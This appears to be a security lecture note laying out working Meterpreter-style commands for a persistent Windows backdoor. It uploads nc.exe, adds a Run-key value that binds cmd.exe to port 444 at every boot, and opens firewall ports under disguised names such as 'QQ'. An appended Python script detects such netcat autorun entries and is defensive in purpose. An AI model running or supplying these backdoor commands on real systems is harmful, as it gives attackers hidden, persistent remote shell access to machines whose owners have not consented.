T3SEC - Lecture 8: nc backdoor
Hidden backdoor
1. Upload the nc backdoor
- upload /root/nc.exe c:\\windows\\system32
2. Modify the registry
- reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
- reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:\Windows\system32\nc.exe -Ldp 444 -e cmd.exe' // add the nc value
- reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc // view it
3. Firewall: allow the port
- execute -f cmd -i -H // spawn a shell
- cmd: netsh firewall show opmode // show the firewall status
- netsh firewall add portopening tcp 444 "textx" ENABLE ALL
- netsh firewall add portopening TCP 4444 "FireWall" ENABLE ALL
- netsh firewall add portopening TCP 7776 "QQ" ENABLE ALL
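
Seen from the defender's side, the Run value created in step 2 shows up in `reg query` output for the same key. The following is an added example, not part of the original post: it parses that output and flags autorun entries that start a netcat-style listener attached to a shell, including a renamed binary. The sample text and all function names are constructed for illustration.

```python
import re

# Constructed sample of `reg query` output for the Run key (not from a real host).
SAMPLE = r"""
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    nc    REG_SZ    C:\Windows\system32\nc.exe -Ldp 444 -e cmd.exe
    Updater    REG_EXPAND_SZ    %ProgramFiles%\Vendor\update.exe /background
"""

VALUE_RE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe"}

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def split_command(data):
    """Split a command line into tokens, keeping double-quoted paths whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', data)]

def audit_run_values(reg_output):
    """Return Run-key values that look like a netcat listener bound to a shell."""
    findings = []
    for line in reg_output.splitlines():
        m = VALUE_RE.match(line)
        tokens = split_command(m["data"]) if m else []
        if not tokens:
            continue
        reasons, port = [], None
        if basename(tokens[0]) in NETCAT_NAMES:
            reasons.append("netcat binary in autorun")
        for tok, nxt in zip(tokens[1:], tokens[2:] + [""]):
            if not re.fullmatch(r"-[A-Za-z]+", tok):
                continue
            flags = tok[1:]
            if "e" in flags and basename(nxt) in SHELLS:
                reasons.append("-e hands the connection to a shell")
            if "p" in flags and nxt.isdigit():
                port = int(nxt)
            if "l" in flags.lower():
                reasons.append("listen mode")
        # Listen/port flags alone are too generic; require netcat or -e <shell>.
        if any(r.startswith(("netcat", "-e")) for r in reasons):
            findings.append({"name": m["name"], "data": m["data"], "port": port, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in audit_run_values(SAMPLE):
        print(finding)
```

A flagged port can then be compared against the firewall port openings on the host, since the allow rules in step 3 use unrelated display names.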